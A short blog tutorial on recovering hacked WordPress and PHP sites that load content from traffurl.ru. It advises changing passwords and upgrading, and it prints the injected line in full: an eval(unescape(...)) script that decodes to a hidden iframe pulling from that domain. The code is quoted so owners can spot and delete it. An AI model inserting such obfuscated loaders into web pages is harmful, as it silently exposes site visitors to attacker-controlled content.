Tutorial: My blog has been hacked (traffurl.ru)

Lately I have noticed a lot of my blogs and php sites keep getting hacked and when they are loaded they start downloading data from the URL traffurl.ru.

If you are having similar problems change all of your passwords, this includes you hosting account password, wordpress login password and FTP access passwords. This will go someway to stopping these idiots hacking your site.

If you are using Wordpress ensure that you have upgraded to the highest version possible (stable one obviously) and then you stand a chance of not getting hacked because of vulnerabilities in the coding of some of the previous versions.

Also I have found that when my sites have been hacked a line of code has been added to the top similar to this:

<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27

%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e

%61%6d%65%3d%66%66%34%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%74%72%61%66%66

%75%72%6c%2e%72%75%2f%73%6c%69%76%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%

61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%33%36%31%31%35%29%2b%27%39%5c%27%20%

77%69%64%74%68%3d%37%39%35%20%68%65%69%67%68%74%3d%32%39%37%20%73%74%79%6c%65

%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%

65%3e%27%29"));</script>

In wordpress this appears in the index.php page of your wordpress installation so open the file and delete this line of code. A lot of people tend to just reinstall wordpress which is a lot of hassle if it is all set up and working great, so deleting this line is a much better idea and don’t forget to change your passwords.

Brought to you by The Computing Expert

607 views